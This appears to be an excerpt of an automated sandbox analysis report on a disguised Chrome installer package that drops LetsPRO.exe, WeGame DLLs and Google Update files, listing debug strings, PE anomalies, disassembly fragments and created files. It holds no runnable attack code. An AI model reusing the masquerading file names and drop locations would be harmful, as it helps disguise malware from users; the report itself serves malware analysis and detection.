                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4 source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_hi.pdb source: GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2117894739.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2118068933.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\LetsPRO.exeU source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: GoogleUpdateOnDemand_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2169549013.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2170069383.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2169861546.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateOnDemand.exe.30.dr, GoogleUpdateOnDemand.exe.16.dr
                  Source: Binary string: 785491~1.LOCntkrnlmp.pdb5x source: LetsPRO.exe, 00000004.00000003.2233041537.00000000005FD000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdate_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000002.3271726771.000000006CE05000.00000002.00000001.01000000.00000009.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104207516.00000000057C1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5r source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aischeduler2.pdb source: sutup-Chrome.13.26.x64.msi, 5bb04c.rbs.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_ms.pdb source: goopdateres_ms.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_fr.pdb source: GoogleUpdate.exe, 0000001E.00000003.2116622503.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116824716.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116622503.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fr.dll.30.dr
                  Source: Binary string: msvcr100.i386.pdb source: LetsPRO.exe, LetsPRO.exe, 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000D.00000002.2181610240.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000E.00000002.2186367127.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000000F.00000002.2173589064.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000011.00000002.2191724074.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000012.00000002.2192475621.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 00000013.00000002.2192454597.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001A.00000002.2192585742.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001B.00000002.2192407874.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001C.00000002.2191917426.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001D.00000002.2181725589.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, LetsPRO.exe, 0000001F.00000002.2209318696.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp
                  Source: Binary string: GoogleCrashHandler64_unsigned.pdb source: GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler64.exe.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_zh-CN.pdb source: GoogleUpdate.exe, 0000001E.00000002.3269312732.0000000000E60000.00000002.00000001.00040000.0000000D.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_kn.pdb source: GoogleUpdate.exe, 0000001E.00000003.2131480037.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131988902.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2131480037.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbE source: sutup-Chrome.13.26.x64.msi, MSIB54D.tmp.1.dr
                  Source: Binary string: TEST_goopdateres_unsigned_ml.pdb source: goopdateres_ml.dll.16.dr
                  Source: Binary string: on Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: LetsPRO.exe, 00000004.00000003.2287547893.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_fil.pdb source: GoogleUpdate.exe, 0000001E.00000003.2116341966.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116214832.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2116214832.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ur.pdb source: goopdateres_ur.dll.30.dr
                  Source: Binary string: load_prod.pdb\*.*5n source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_sv.pdb source: goopdateres_sv.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_fi.pdb source: GoogleUpdate.exe, 0000001E.00000003.2115798328.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115924326.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2115798328.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_fi.dll.16.dr
                  Source: Binary string: GoogleUpdateCore_unsigned.pdbV source: ChromeSetup.exe, 00000010.00000002.3262108532.00000000008C4000.00000004.00000010.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104991502.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2105067095.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2104969687.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdateCore.exe.30.dr, GoogleUpdateCore.exe.16.dr
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\ source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_nl.pdb source: goopdateres_nl.dll.16.dr
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\LetsPRO.exe source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_ro.pdb source: goopdateres_ro.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_sw.pdb source: goopdateres_sw.dll.16.dr, goopdateres_sw.dll.30.dr
                  Source: Binary string: GoogleCrashHandler64_unsigned.pdbl source: GoogleUpdate.exe, 0000001E.00000003.2105591928.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, GoogleCrashHandler64.exe.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_hu.pdb source: GoogleUpdate.exe, 0000001E.00000003.2119453694.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119237842.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119237842.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_hu.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_ta.pdb source: goopdateres_ta.dll.16.dr
                  Source: Binary string: TEST_psmachine_unsigned.pdbJ source: GoogleUpdate.exe, 0000001E.00000003.2149107681.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, psmachine.dll.16.dr
                  Source: Binary string: pplication Data\Temp\Symbols\ntkrnlmp.pdb\*.*so source: LetsPRO.exe, 00000004.00000003.2287547893.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbl: source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_it.pdb source: GoogleUpdate.exe, 0000001E.00000003.2125024951.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2126078995.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2125024951.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_it.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_en-GB.pdb source: GoogleUpdate.exe, 0000001E.00000003.2112956106.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112849387.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2112849387.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, goopdateres_en-GB.dll.30.dr
                  Source: Binary string: TEST_goopdateres_unsigned_sk.pdb source: goopdateres_sk.dll.16.dr, goopdateres_sk.dll.30.dr
                  Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.*a+ source: LetsPRO.exe, 00000004.00000002.3261617800.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LetsPRO.exe, 00000004.00000003.2287520306.0000000000615000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_te.pdb source: goopdateres_te.dll.16.dr
                  Source: Binary string: TEST_goopdateres_unsigned_id.pdb source: GoogleUpdate.exe, 0000001E.00000003.2120248685.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2119985698.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\LetsPRO.exe source: LetsPRO.exe, 00000004.00000002.3261617800.00000000005AE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\LetsPRO.exe4 source: LetsPRO.exe, 00000004.00000003.2233041537.0000000000614000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.*F source: LetsPRO.exe, 00000004.00000003.2233011919.0000000000628000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: LetsPRO.exe, 00000004.00000003.2233090425.00000000005EB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_vi.pdb source: goopdateres_vi.dll.30.dr
                  Source: Binary string: \??\C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\LetsPRO.exenage source: LetsPRO.exe, 00000004.00000003.2287615622.00000000005E7000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: TEST_goopdateres_unsigned_es.pdb source: GoogleUpdate.exe, 0000001E.00000003.2113768779.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113540436.0000000000BAF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000001E.00000003.2113540436.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, goopdateres_es.dll.30.dr, goopdateres_es.dll.16.dr
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F37490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,4_2_03F37490
                  Source: GoogleUpdateSetup.exe.16.dr Static PE information: real checksum: 0x154762 should be: 0x15c4ea
                  Source: LetsPRO.exe.4.dr Static PE information: real checksum: 0x0 should be: 0x6020
                  Source: LetsPRO.exe.1.dr Static PE information: real checksum: 0x0 should be: 0x6020
                  Source: ChromeSetup.exe.1.dr Static PE information: real checksum: 0x154762 should be: 0x15c4ea
                  Source: beacon_sdk.dll.1.dr Static PE information: section name: .QMGuid
                  Source: common.dll.1.dr Static PE information: section name: .QMGuid
                  Source: Lua51.dll.1.dr Static PE information: section name: .00cfg
                  Source: MSIB404.tmp.1.dr Static PE information: section name: .didat
                  Source: MSIB5FB.tmp.1.dr Static PE information: section name: .didat
                  Source: GoogleUpdateComRegisterShell64.exe.16.dr Static PE information: section name: _RDATA
                  Source: GoogleUpdateComRegisterShell64.exe.16.dr Static PE information: section name: .gxfg
                  Source: GoogleUpdateComRegisterShell64.exe.16.dr Static PE information: section name: .gehcont
                  Source: psmachine.dll.16.dr Static PE information: section name: .orpc
                  Source: psmachine_64.dll.16.dr Static PE information: section name: .orpc
                  Source: psmachine_64.dll.16.dr Static PE information: section name: _RDATA
                  Source: psmachine_64.dll.16.dr Static PE information: section name: .gxfg
                  Source: psmachine_64.dll.16.dr Static PE information: section name: .gehcont
                  Source: psuser.dll.16.dr Static PE information: section name: .orpc
                  Source: psuser_64.dll.16.dr Static PE information: section name: .orpc
                  Source: psuser_64.dll.16.dr Static PE information: section name: _RDATA
                  Source: psuser_64.dll.16.dr Static PE information: section name: .gxfg
                  Source: psuser_64.dll.16.dr Static PE information: section name: .gehcont
                  Source: GoogleCrashHandler64.exe.16.dr Static PE information: section name: _RDATA
                  Source: GoogleCrashHandler64.exe.16.dr Static PE information: section name: .gxfg
                  Source: GoogleCrashHandler64.exe.16.dr Static PE information: section name: .gehcont
                  Source: psuser.dll.30.dr Static PE information: section name: .orpc
                  Source: psuser_64.dll.30.dr Static PE information: section name: .orpc
                  Source: psuser_64.dll.30.dr Static PE information: section name: _RDATA
                  Source: psuser_64.dll.30.dr Static PE information: section name: .gxfg
                  Source: psuser_64.dll.30.dr Static PE information: section name: .gehcont
                  Source: psmachine.dll.30.dr Static PE information: section name: .orpc
                  Source: psmachine_64.dll.30.dr Static PE information: section name: .orpc
                  Source: psmachine_64.dll.30.dr Static PE information: section name: _RDATA
                  Source: psmachine_64.dll.30.dr Static PE information: section name: .gxfg
                  Source: psmachine_64.dll.30.dr Static PE information: section name: .gehcont
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_025F9E65 push ecx; ret 4_2_025F9E78
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F44345 push ecx; ret 4_2_03F44358
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F5A168 push eax; ret 4_2_03F5A119
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 4_2_03F5A0B8 push eax; ret 4_2_03F5A119
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C8F2D80 push eax; ret 5_2_6C8F2D9E
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C9009C5 push ecx; ret 5_2_6C9009D8
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C91A6CA push EF3FEFD4h; iretd 5_2_6C91A6D1
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C919CF8 pushad ; iretd 5_2_6C919D06
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe Code function: 5_2_6C90BFB0 push ecx; ret 5_2_6C90BFC3
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00258835 push ecx; ret 8_2_00258848
                  Source: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe Code function: 8_2_00258C76 push ecx; ret 8_2_00258C89
                  Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_000159A6 push ecx; ret 16_2_000159B9
                  Source: C:\Program Files (x86)\ChromeSetup.exe Code function: 16_2_00026CF3 push ecx; ret 16_2_00026D06
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_00134543 push ecx; ret 30_2_00134556
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe Code function: 30_2_00127A56 push ecx; ret 30_2_00127A69
                  Source: msvcr100.dll.1.dr Static PE information: section name: .text entropy: 6.910468675356735

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\netsh.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepub
                  Source: C:\Program Files (x86)\ChromeSetup.exe Executable created and started: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_it.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sw.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateComRegisterShell64.exe
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler64.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ca.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_nl.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hu.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ta.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ro.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_am.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sv.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ml.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine_64.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ur.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_zh-CN.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_vi.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_is.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_pt-PT.dll
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\psmachine.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fr.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_da.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_iw.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_kn.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_et.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_no.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_te.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sk.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\psmachine_64.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_en.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdate.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ja.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ko.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\psuser_64.dll
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\WeGame\beacon_sdk.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_es-419.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_sl.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_ms.dll
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ChromeSetup.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleCrashHandler64.exe
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fil.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_zh-CN.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_mr.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_fa.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sr.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_lt.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ms.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_bg.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateComRegisterShell64.exe
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fil.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fi.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_id.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_no.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pt-PT.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_pl.dll
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\WeGame\common.dll
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB59C.tmp
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_fr.dll
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\msvcp100.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_gu.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_cs.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_uk.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_th.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_de.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdateSetup.exe
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_tr.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hr.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ru.dll
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB54D.tmp
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exe File created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_hi.dll
                  Source: C:\Program Files (x86)\ChromeSetup.exe File created: C:\Windows\SystemTemp\GUMBC12.tmp\goopdateres_sw.dll
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\goopdateres_ca.dllJump to dropped file
                  Source: C:\Windows\SystemTemp\GUMBC12.tmp\GoogleUpdate.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleCrashHandler.exeJump to dropped file
